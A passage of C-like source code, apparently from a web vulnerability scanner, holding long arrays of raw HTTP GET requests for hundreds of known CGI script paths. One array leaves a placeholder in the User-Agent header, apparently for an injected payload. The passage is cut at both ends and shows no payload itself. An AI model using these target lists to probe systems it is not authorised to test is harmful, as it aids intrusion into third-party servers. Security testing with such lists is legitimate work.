HTTP/1.0\nUser-Agent:%s\n\n"; buff[263] = "GET /cgi-bin/way-board/way-board.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[264] = "GET /cgi-bin/webbbs.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[265] = "GET /cgi-bin/webcart/webcart.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[266] = "GET /cgi-bin/webdist.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[267] = "GET /cgi-bin/webif.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[268] = "GET /cgi-bin/webmail/html/emumail.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[269] = "GET /cgi-bin/webmap.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[270] = "GET /cgi-bin/webspirs.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[271] = "GET /cgi-bin/whois.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[272] = "GET /cgi-bin/whois/whois.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[273] = "GET /cgi-bin/whois_raw.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[274] = "GET /cgi-bin/wrap HTTP/1.0\nUser-Agent:%s\n\n"; buff[275] = "GET /cgi-bin/wrap.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[276] = "GET /cgi-bin/wwwboard.cgi.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[277] = "GET /cgi-bin/YaBB/YaBB.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[278] = "GET /cgi-bin/zml.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[279] = "GET /cgi-sys/addalink.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[280] = "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[281] = "GET /cgi-sys/domainredirect.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[282] = "GET /cgi-sys/entropybanner.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[283] = "GET /cgi-sys/entropysearch.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[284] = "GET /cgi-sys/FormMail-clone.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[285] = "GET /cgi-sys/helpdesk.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[286] = "GET /cgi-sys/mchat.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[287] = "GET /cgi-sys/randhtml.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[288] = "GET /cgi-sys/realhelpdesk.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[289] = "GET /cgi-sys/realsignup.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[290] = "GET /cgi-sys/signup.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[291] = "GET /cgis/wwwboard/wwwboard.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[292] = "GET /connector.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[293] = "GET /cp/rac/nsManager.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[294] = "GET /create_release.sh HTTP/1.0\nUser-Agent:%s\n\n"; buff[295] = "GET /CSNews.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[296] = "GET /csPassword.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[297] = "GET /dcadmin.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[298] = "GET /dcboard.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[299] = "GET /dcforum.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[300] = "GET /dcforum/dcforum.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[301] = "GET /debuff.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[302] = "GET /details.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[303] = "GET /edittag/edittag.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[304] = "GET /emumail.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[305] = "GET /enter_buff.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[306] = "GET /ez2000/ezadmin.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[307] = "GET /ez2000/ezboard.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[308] = "GET /ez2000/ezman.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[309] = "GET /fcgi-bin/echo HTTP/1.0\nUser-Agent:%s\n\n"; buff[310] = "GET /fcgi-bin/echo2 HTTP/1.0\nUser-Agent:%s\n\n"; buff[311] = "GET /Gozila.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[312] = "GET /hitmatic/analyse.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[313] = "GET /html/cgi-bin/cgicso HTTP/1.0\nUser-Agent:%s\n\n"; buff[314] = "GET /index.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[315] = "GET /info.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[316] = "GET /infosrch.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[317] = "GET /login.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[318] = "GET /mailview.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[319] = "GET /main.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[320] = "GET /megabook/admin.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[321] = "GET /ministats/admin.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[322] = "GET /mods/apage/apage.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[323] = "GET /musicqueue.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[324] = "GET /ncbook.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[325] = "GET /newpro.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[326] = "GET /newsletter.sh HTTP/1.0\nUser-Agent:%s\n\n"; buff[327] = "GET /oem_webstage/cgi-bin/oemapp_cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[328] = "GET /page.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[329] = "GET /parse_xml.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[330] = "GET /photo/manage.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[331] = "GET /photodata/manage.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[332] = "GET /print.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[333] = "GET /process_buff.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[334] = "GET /pub/english.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[335] = "GET /quikmail/nph-emumail.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[336] = "GET /quikstore.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[337] = "GET /reviews/newpro.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[338] = "GET /ROADS/cgi-bin/search.pl HTTP/1.0\nUser-Agent:%s\n\n"; buff[339] = "GET /sample01.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[340] = "GET /sample02.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[341] = "GET /sample03.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[342] = "GET /sample04.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[343] = "GET /sampleposteddata.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[344] = "GET /scancfg.cgi\n\n"; buff[345] = "GET /servers/link.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[346] = "GET /setpasswd.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[347] = "GET /SetSecurity.shm HTTP/1.0\nUser-Agent:%s\n\n"; buff[348] = "GET /shop/member_html.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[349] = "GET /shop/normal_html.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[350] = "GET /site_searcher.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[351] = "GET /siteUserMod.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[352] = "GET /submit.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[353] = "GET /technote/print.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[354] = "GET /template.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[355] = "GET /test.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[356] = "GET /upload.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[357] = "GET /userreg.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[358] = "GET /users/scripts/submit.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[359] = "GET /Web_Store/web_store.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[360] = "GET /webtools/bonsai/ccvsblame.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[361] = "GET /webtools/bonsai/cvsblame.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[362] = "GET /webtools/bonsai/cvslog.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[363] = "GET /webtools/bonsai/cvsquery.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[364] = "GET /webtools/bonsai/cvsqueryform.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[365] = "GET /webtools/bonsai/showcheckins.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[366] = "GET /wwwadmin.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[367] = "GET /wwwboard.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[368] = "GET /cgi-sys/entropysearch.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[369] = "GET /cgi-sys/FormMail-clone.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[370] = "GET /wwwboard/wwwboard.cgi HTTP/1.0\nUser-Agent:%s\n\n"; bug[1] = "GET /_mt/mt.cgi HTTP/1.0\n\n"; bug[2] = "GET /admin.cgi HTTP/1.0\n\n"; bug[3] = "GET /administrator.cgi HTTP/1.0\n\n"; bug[4] = "GET /agora.cgi HTTP/1.0\n\n"; bug[5] = "GET /aktivate/cgi-bin/catgy.cgi HTTP/1.0\n\n"; bug[6] = "GET /analyse.cgi HTTP/1.0\n\n"; bug[7] = "GET /apps/web/vs_diag.cgi HTTP/1.0\n\n"; bug[8] = "GET /axis-cgi/buffer/command.cgi HTTP/1.0\n\n"; bug[9] = "GET /bandwidth/index.cgi HTTP/1.0\n\n"; bug[10] = "GET /bigconf.cgi HTTP/1.0\n\n"; bug[11] = "GET /cart.cgi HTTP/1.0\n\n"; bug[12] = "GET /cartcart.cgi HTTP/1.0\n\n"; bug[13] = "GET /ccbill/whereami.cgi HTTP/1.0\n\n"; bug[14] = "GET /cgi-bin/status HTTP/1.0\n\n"; bug[15] = "GET /cgi-bin-sdb/printenv HTTP/1.0\n\n"; bug[16] = "GET /cgi-bin/.cobalt/alert/service.cgi HTTP/1.0\n\n"; bug[17] = "GET /cgi-bin/.cobalt/message/message.cgi HTTP/1.0\n\n"; bug[18] = "GET /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.0\n\n"; bug[19] = "GET /cgi-bin/.namazu.cgi HTTP/1.0\n\n"; bug[20] = "GET /cgi-bin/14all-1.1.cgi HTTP/1.0\n\n"; bug[21] = "GET /cgi-bin/14all.cgi HTTP/1.0\n\n"; bug[22] = "GET /cgi-bin/a1disp3.cgi HTTP/1.0\n\n"; bug[23] = "GET /cgi-bin/a1stats/a1disp3.cgi HTTP/1.0\n\n"; bug[24] = "GET /cgi-bin/a1stats/a1disp4.cgi HTTP/1.0\n\n"; bug[25] = "GET /cgi-bin/add_ftp.cgi HTTP/1.0\n\n"; bug[26] = "GET /cgi-bin/addbanner.cgi HTTP/1.0\n\n"; bug[27] = "GET /cgi-bin/adduser.cgi HTTP/1.0\n\n"; bug[28] = "GET /cgi-bin/admin.cgi HTTP/1.0\n\n"; bug[29] = "GET /cgi-bin/admin.pl HTTP/1.0\n\n"; bug[30] = "GET /cgi-bin/admin/admin.cgi HTTP/1.0\n\n"; bug[31] = "GET /cgi-bin/admin/setup.cgi HTTP/1.0\n\n"; bug[32] = "GET /cgi-bin/adminhot.cgi HTTP/1.0\n\n"; bug[33] = "GET /cgi-bin/adminwww.cgi HTTP/1.0\n\n"; bug[34] = "GET /cgi-bin/af.cgi HTTP/1.0\n\n"; bug[35] = "GET /cgi-bin/aglimpse.cgi HTTP/1.0\n\n"; bug[36] = "GET /cgi-bin/alienform.cgi HTTP/1.0\n\n"; bug[37] = "GET /cgi-bin/AnyBoard.cgi HTTP/1.0\n\n"; bug[38] = "GET /cgi-bin/architext_query.cgi HTTP/1.0\n\n"; bug[39] = "GET /cgi-bin/astrocam.cgi HTTP/1.0\n\n"; bug[40] = "GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n"; bug[41] = "GET /cgi-bin/AT-generate.cgi HTTP/1.0\n\n"; bug[42] = "GET /cgi-bin/auction/auction.cgi HTTP/1.0\n\n"; bug[43] = "GET /cgi-bin/auktion.cgi HTTP/1.0\n\n"; bug[44] = "GET /cgi-bin/ax-admin.cgi HTTP/1.0\n\n"; bug[45] = "GET /cgi-bin/ax.cgi HTTP/1.0\n\n"; bug[46] = "GET /cgi-bin/axs.cgi HTTP/1.0\n\n"; bug[47] = "GET /cgi-bin/badmin.cgi HTTP/1.0\n\n"; bug[48] = "GET /cgi-bin/banner.cgi HTTP/1.0\n\n"; bug[49] = "GET /cgi-bin/bannereditor.cgi HTTP/1.0\n\n"; bug[50] = "GET /cgi-bin/bb-ack.sh HTTP/1.0\n\n"; bug[51] = "GET /cgi-bin/bb-hist.sh HTTP/1.0\n\n"; bug[52] = "GET /cgi-bin/bb-histlog.sh HTTP/1.0\n\n"; bug[53] = "GET /cgi-bin/bb-hostsvc.sh HTTP/1.0\n\n"; bug[54] = "GET /cgi-bin/bb-rep.sh HTTP/1.0\n\n"; bug[55] = "GET /cgi-bin/bb-replog.sh HTTP/1.0\n\n"; bug[56] = "GET /cgi-bin/bbs_forum.cgi HTTP/1.0\n\n"; bug[57] = "GET /cgi-bin/bigconf.cgi HTTP/1.0\n\n"; bug[58] = "GET /cgi-bin/bizdb1-search.cgi HTTP/1.0\n\n"; bug[59] = "GET /cgi-bin/blog/mt-check.cgi HTTP/1.0\n\n"; bug[60] = "GET /cgi-bin/blog/mt-load.cgi HTTP/1.0\n\n"; bug[61] = "GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n"; bug[62] = "GET /cgi-bin/book.cgi HTTP/1.0\n\n"; bug[63] = "GET /cgi-bin/boozt/admin/index.cgi HTTP/1.0\n\n"; bug[64] = "GET /cgi-bin/bsguest.cgi HTTP/1.0\n\n"; bug[65] = "GET /cgi-bin/bslist.cgi HTTP/1.0\n\n"; bug[66] = "GET /cgi-bin/build.cgi HTTP/1.0\n\n"; bug[67] = "GET /cgi-bin/bulk/bulk.cgi HTTP/1.0\n\n"; bug[68] = "GET /cgi-bin/c_download.cgi HTTP/1.0\n\n"; bug[69] = "GET /cgi-bin/cached_feed.cgi HTTP/1.0\n\n"; bug[70] = "GET /cgi-bin/cachemgr.cgi HTTP/1.0\n\n"; bug[71] = "GET /cgi-bin/calendar/index.cgi HTTP/1.0\n\n"; bug[72] = "GET /cgi-bin/cartmanager.cgi HTTP/1.0\n\n"; bug[73] = "GET /cgi-bin/cbmc/forums.cgi HTTP/1.0\n\n"; bug[74] = "GET /cgi-bin/ccvsblame.cgi HTTP/1.0\n\n"; bug[75] = "GET /cgi-bin/cgforum.cgi HTTP/1.0\n\n"; bug[76] = "GET /cgi-bin/cgi_process HTTP/1.0\n\n"; bug[77] = "GET /cgi-bin/classified.cgi HTTP/1.0\n\n"; bug[78] = "GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n"; bug[79] = "GET /cgi-bin/classifieds/classifieds.cgi HTTP/1.0\n\n"; bug[80] = "GET /cgi-bin/classifieds/index.cgi HTTP/1.0\n\n"; bug[81] = "GET /cgi-bin/commandit.cgi HTTP/1.0\n\n"; bug[82] = "GET /cgi-bin/commerce.cgi HTTP/1.0\n\n"; bug[83] = "GET /cgi-bin/common/listrec.pl HTTP/1.0\n\n"; bug[84] = "GET /cgi-bin/compatible.cgi HTTP/1.0\n\n"; bug[85] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n"; bug[86] = "GET /cgi-bin/csChatRBox.cgi HTTP/1.0\n\n"; bug[87] = "GET /cgi-bin/csGuestBook.cgi HTTP/1.0\n\n"; bug[88] = "GET /cgi-bin/csLiveSupport.cgi HTTP/1.0\n\n"; bug[89] = "GET /cgi-bin/CSMailto.cgi HTTP/1.0\n\n"; bug[90] = "GET /cgi-bin/CSMailto/CSMailto.cgi HTTP/1.0\n\n"; bug[91] = "GET /cgi-bin/csNews.cgi HTTP/1.0\n\n"; bug[92] = "GET /cgi-bin/csNewsPro.cgi HTTP/1.0\n\n"; bug[93] = "GET /cgi-bin/csPassword.cgi HTTP/1.0\n\n"; bug[94] = "GET /cgi-bin/csPassword/csPassword.cgi HTTP/1.0\n\n"; bug[95] = "GET /cgi-bin/csSearch.cgi HTTP/1.0\n\n"; bug[96] = "GET /cgi-bin/csv_db.cgi HTTP/1.0\n\n"; bug[97] = "GET /cgi-bin/cvsblame.cgi HTTP/1.0\n\n"; bug[98] = "GET /cgi-bin/cvslog.cgi HTTP/1.0\n\n"; bug[99] = "GET /cgi-bin/cvsquery.cgi HTTP/1.0\n\n"; bug[100] = "GET /cgi-bin/cvsqueryform.cgi HTTP/1.0\n\n"; bug[101] = "GET /cgi-bin/day5datacopier.cgi HTTP/1.0\n\n"; bug[102] = "GET /cgi-bin/day5datanotifier.cgi HTTP/1.0\n\n"; bug[103] = "GET /cgi-bin/db_manager.cgi HTTP/1.0\n\n"; bug[104] = "GET /cgi-bin/dbman/db.cgi HTTP/1.0\n\n"; bug[105] = "GET /cgi-bin/dcforum.cgi HTTP/1.0\n\n"; bug[106] = "GET /cgi-bin/dfire.cgi HTTP/1.0\n\n"; bug[107] = "GET /cgi-bin/diagnose.cgi HTTP/1.0\n\n"; bug[108] = "GET /cgi-bin/dig.cgi HTTP/1.0\n\n"; bug[109] = "GET /cgi-bin/directorypro.cgi HTTP/1.0\n\n"; bug[110] = "GET /cgi-bin/download.cgi HTTP/1.0\n\n"; bug[111] = "GET /cgi-bin/emu/html/emumail.cgi HTTP/1.0\n\n"; bug[112] = "GET /cgi-bin/emumail.cgi HTTP/1.0\n\n"; bug[113] = "GET /cgi-bin/emumail/emumail.cgi HTTP/1.0\n\n"; bug[114] = "GET /cgi-bin/enter.cgi HTTP/1.0\n\n"; bug[115] = "GET /cgi-bin/environ.cgi HTTP/1.0\n\n"; bug[116] = "GET /cgi-bin/ezadmin.cgi HTTP/1.0\n\n"; bug[117] = "GET /cgi-bin/ezboard.cgi HTTP/1.0\n\n"; bug[118] = "GET /cgi-bin/ezman.cgi HTTP/1.0\n\n"; bug[119] = "GET /cgi-bin/ezshopper/loadpage.cgi HTTP/1.0\n\n"; bug[120] = "GET/cgi-bin/ezshopper/search.cgi HTTP/1.0\n\n"; bug[121] = "GET /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0\n\n"; bug[122] = "GET /cgi-bin/ezshopper3/loadpage.cgi HTTP/1.0\n\n"; bug[123] = "GET /cgi-bin/faqmanager.cgi HTTP/1.0\n\n"; bug[124] = "GET /cgi-bin/FileSeek.cgi HTTP/1.0\n\n"; bug[125] = "GET /cgi-bin/FileSeek2.cgi HTTP/1.0\n\n"; bug[126] = "GET /cgi-bin/finger.cgi HTTP/1.0\n\n"; bug[127] = "GET /cgi-bin/flexform.cgi HTTP/1.0\n\n"; bug[128] = "GET /cgi-bin/fom.cgi HTTP/1.0\n\n"; bug[129] = "GET /cgi-bin/fom/fom.cgi HTTP/1.0\n\n"; bug[130] = "GET /cgi-bin/FormHandler.cgi HTTP/1.0\n\n"; bug[131] = "GET /cgi-bin/FormMail.cgi HTTP/1.0\n\n"; bug[132] = "GET /cgi-bin/gbadmin.cgi HTTP/1.0\n\n"; bug[133] = "GET /cgi-bin/gbook/gbook.cgi HTTP/1.0\n\n"; bug[134] = "GET /cgi-bin/generate.cgi HTTP/1.0\n\n"; bug[135] = "GET /cgi-bin/getdoc.cgi HTTP/1.0\n\n"; bug[136] = "GET /cgi-bin/gH.cgi HTTP/1.0\n\n"; bug[137] = "GET /cgi-bin/gm-authors.cgi HTTP/1.0\n\n"; bug[138] = "GET /cgi-bin/gm-cplog.cgi HTTP/1.0\n\n"; bug[139] = "GET /cgi-bin/gm.cgi HTTP/1.0\n\n"; bug[140] = "GET /cgi-bin/guestbook.cgi HTTP/1.0\n\n"; bug[141] = "GET /cgi-bin/handler HTTP/1.0\n\n"; bug[142] = "GET /cgi-bin/handler.cgi HTTP/1.0\n\n"; bug[143] = "GET /cgi-bin/handler/netsonar HTTP/1.0\n\n"; bug[144] = "GET /cgi-bin/hitview.cgi HTTP/1.0\n\n"; bug[145] = "GET /cgi-bin/hsx.cgi HTTP/1.0\n\n"; bug[146] = "GET /cgi-bin/html2chtml.cgi HTTP/1.0\n\n"; bug[147] = "GET /cgi-bin/html2wml.cgi HTTP/1.0\n\n"; bug[148] = "GET /cgi-bin/htsearch.cgi HTTP/1.0\n\n"; bug[149] = "GET /cgi-bin/icat HTTP/1.0\n\n"; bug[150] = "GET /cgi-bin/if/admin/nph-build.cgi HTTP/1.0\n\n"; bug[151] = "GET /cgi-bin/ikonboard/help.cgi HTTP/1.0\n\n"; bug[152] = "GET /cgi-bin/imageFolio.cgi HTTP/1.0\n\n"; bug[153] = "GET /cgi-bin/ImageFolio/admin/admin.cgi HTTP/1.0\n\n"; bug[154] = "GET /cgi-bin/infosrch.cgi HTTP/1.0\n\n"; bug[155] = "GET /cgi-bin/jammail.pl HTTP/1.0\n\n"; bug[156] = "GET /cgi-bin/journal.cgi HTTP/1.0\n\n"; bug[157] = "GET /cgi-bin/lastlines.cgi HTTP/1.0\n\n"; bug[158] = "GET /cgi-bin/loadpage.cgi HTTP/1.0\n\n"; bug[159] = "GET /cgi-bin/log-reader.cgi HTTP/1.0\n\n"; bug[160] = "GET /cgi-bin/login.cgi HTTP/1.0\n\n"; bug[161] = "GET /cgi-bin/logit.cgi HTTP/1.0\n\n"; bug[162] = "GET /cgi-bin/lookwho.cgi HTTP/1.0\n\n"; bug[163] = "GET /cgi-bin/lwgate.cgi HTTP/1.0\n\n"; bug[164] = "GET /cgi-bin/MachineInfo HTTP/1.0\n\n"; bug[165] = "GET /cgi-bin/magiccard.cgi HTTP/1.0\n\n"; bug[166] = "GET /cgi-bin/mail/emumail.cgi HTTP/1.0\n\n"; bug[167] = "GET /cgi-bin/mail/nph-mr.cgi HTTP/1.0\n\n"; bug[168] = "GET /cgi-bin/maillist.cgi HTTP/1.0\n\n"; bug[169] = "GET /cgi-bin/mailnews.cgi HTTP/1.0\n\n"; bug[170] = "GET /cgi-bin/main.cgi HTTP/1.0\n\n"; bug[171] = "GET /cgi-bin/main_menu.pl HTTP/1.0\n\n"; bug[172] = "GET /cgi-bin/man.sh HTTP/1.0\n\n"; bug[173] = "GET /cgi-bin/mini_logger.cgi HTTP/1.0\n\n"; bug[174] = "GET /cgi-bin/mmstdod.cgi HTTP/1.0\n\n"; bug[175] = "GET /cgi-bin/moin.cgi HTTP/1.0\n\n"; bug[176] = "GET /cgi-bin/mojo/mojo.cgi HTTP/1.0\n\n"; bug[177] = "GET /cgi-bin/mrtg.cgi HTTP/1.0\n\n"; bug[178] = "GET /cgi-bin/mt-static/mt-check.cgi HTTP/1.0\n\n"; bug[179] = "GET /cgi-bin/mt-static/mt-load.cgi HTTP/1.0\n\n"; bug[180] = "GET /cgi-bin/mt/mt-check.cgi HTTP/1.0\n\n"; bug[181] = "GET /cgi-bin/mt/mt-load.cgi HTTP/1.0\n\n"; bug[182] = "GET /cgi-bin/musicqueue.cgi HTTP/1.0\n\n"; bug[183] = "GET /cgi-bin/myguestbook.cgi HTTP/1.0\n\n"; bug[184] = "GET /cgi-bin/netauth.cgi HTTP/1.0\n\n"; bug[185] = "GET /cgi-bin/netpad.cgi HTTP/1.0\n\n"; bug[186] = "GET /cgi-bin/newsdesk.cgi HTTP/1.0\n\n"; bug[187] = "GET /cgi-bin/nlog-smb.cgi HTTP/1.0\n\n"; bug[188] = "GET /cgi-bin/nph-emumail.cgi HTTP/1.0\n\n"; bug[189] = "GET /cgi-bin/nph-exploitscanget.cgi HTTP/1.0\n\n"; bug[190] = "GET /cgi-bin/nph-publish.cgi HTTP/1.0\n\n"; bug[191] = "GET /cgi-bin/nph-test.cgi HTTP/1.0\n\n"; bug[192] = "GET /cgi-bin/pagelog.cgi HTTP/1.0\n\n"; bug[193] = "GET /cgi-bin/pbcgi.cgi HTTP/1.0\n\n"; bug[194] = "GET /cgi-bin/perlshop.cgi HTTP/1.0\n\n"; bug[195] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n"; bug[196] = "GET /cgi-bin/pfdisplay.cgi HTTP/1.0\n\n"; bug[197] = "GET /cgi-bin/phf.cgi HTTP/1.0\n\n"; bug[198] = "GET /cgi-bin/photo/manage.cgi HTTP/1.0\n\n"; bug[199] = "GET /cgi-bin/photo/protected/manage.cgi HTTP/1.0\n\n"; bug[200] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n"; bug[201] = "GET /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi HTTP/1.0\n\n"; bug[202] = "GET /cgi-bin/pollssi.cgi HTTP/1.0\n\n"; bug[203] = "GET /cgi-bin/postcards.cgi HTTP/1.0\n\n"; bug[204] = "GET /cgi-bin/powerup/r.cgi HTTP/1.0\n\n"; bug[205] = "GET /cgi-bin/printenv HTTP/1.0\n\n"; bug[206] = "GET /cgi-bin/probecontrol.cgi HTTP/1.0\n\n"; bug[207] = "GET /cgi-bin/profile.cgi HTTP/1.0\n\n"; bug[208] = "GET /cgi-bin/publisher/search.cgi HTTP/1.0\n\n"; bug[209] = "GET /cgi-bin/quickstore.cgi HTTP/1.0\n\n"; bug[210] = "GET /cgi-bin/quizme.cgi HTTP/1.0\n\n"; bug[211] = "GET /cgi-bin/r.cgi HTTP/1.0\n\n"; bug[212] = "GET /cgi-bin/ratlog.cgi HTTP/1.0\n\n"; bug[213] = "GET /cgi-bin/register.cgi HTTP/1.0\n\n"; bug[214] = "GET /cgi-bin/replicator/webpage.cgi/ HTTP/1.0\n\n"; bug[215] = "GET /cgi-bin/responder.cgi HTTP/1.0\n\n"; bug[216] = "GET /cgi-bin/robadmin.cgi HTTP/1.0\n\n"; bug[217] = "GET /cgi-bin/robpoll.cgi HTTP/1.0\n\n"; bug[218] = "GET /cgi-bin/sbcgi/sitebuilder.cgi HTTP/1.0\n\n"; bug[219] = "GET /cgi-bin/scoadminreg.cgi HTTP/1.0\n\n"; bug[220] = "GET /cgi-bin/search HTTP/1.0\n\n"; bug[221] = "GET /cgi-bin/search.cgi HTTP/1.0\n\n"; bug[222] = "GET /cgi-bin/search/search.cgi HTTP/1.0\n\n"; bug[223] = "GET /cgi-bin/sendform.cgi HTTP/1.0\n\n"; bug[224] = "GET /cgi-bin/shop.cgi HTTP/1.0\n\n"; bug[225] = "GET /cgi-bin/shopper.cgi HTTP/1.0\n\n"; bug[226] = "GET /cgi-bin/shopplus.cgi HTTP/1.0\n\n"; bug[227] = "GET /cgi-bin/showcheckins.cgi HTTP/1.0\n\n"; bug[228] = "GET /cgi-bin/simplestguest.cgi HTTP/1.0\n\n"; bug[229] = "GET /cgi-bin/simplestmail.cgi HTTP/1.0\n\n"; bug[230] = "GET /cgi-bin/smartsearch.cgi HTTP/1.0\n\n"; bug[231] = "GET /cgi-bin/smartsearch/smartsearch.cgi HTTP/1.0\n\n"; bug[232] = "GET /cgi-bin/snorkerz.bat HTTP/1.0\n\n"; bug[233] = "GET /cgi-bin/snorkerz.cmd HTTP/1.0\n\n"; bug[234] = "GET /cgi-bin/sojourn.cgi HTTP/1.0\n\n"; bug[235] = "GET /cgi-bin/spin_client.cgi HTTP/1.0\n\n"; bug[236] = "GET /cgi-bin/start.cgi HTTP/1.0\n\n"; bug[237] = "GET /cgi-bin/store.cgi HTTP/1.0\n\n"; bug[238] = "GET /cgi-bin/store/agora.cgi HTTP/1.0\n\n"; bug[239] = "GET /cgi-bin/store/index.cgi HTTP/1.0\n\n"; bug[240] = "GET /cgi-bin/survey.cgi HTTP/1.0\n\n"; bug[241] = "GET /cgi-bin/talkback.cgi HTTP/1.0\n\n"; bug[242] = "GET /cgi-bin/technote/main.cgi HTTP/1.0\n\n"; bug[243] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n"; bug[244] = "GET /cgi-bin/test.cgi HTTP/1.0\n\n"; bug[245] = "GET /cgi-bin/test/test.cgi HTTP/1.0\n\n"; bug[246] = "GET /cgi-bin/test2.pl HTTP/1.0\n\n"; bug[247] = "GET /cgi-bin/testing_whatever HTTP/1.0\n\n"; bug[248] = "GET /cgi-bin/tidfinder.cgi HTTP/1.0\n\n"; bug[249] = "GET /cgi-bin/tigvote.cgi HTTP/1.0\n\n"; bug[250] = "GET /cgi-bin/title.cgi HTTP/1.0\n\n"; bug[251] = "GET /cgi-bin/traffic.cgi HTTP/1.0\n\n"; bug[252] = "GET /cgi-bin/troops.cgi HTTP/1.0\n\n"; bug[253] = "GET /cgi-bin/ttawebtop.cgi/ HTTP/1.0\n\n"; bug[254] = "GET /cgi-bin/ultraboard.cgi HTTP/1.0\n\n"; bug[255] = "GET 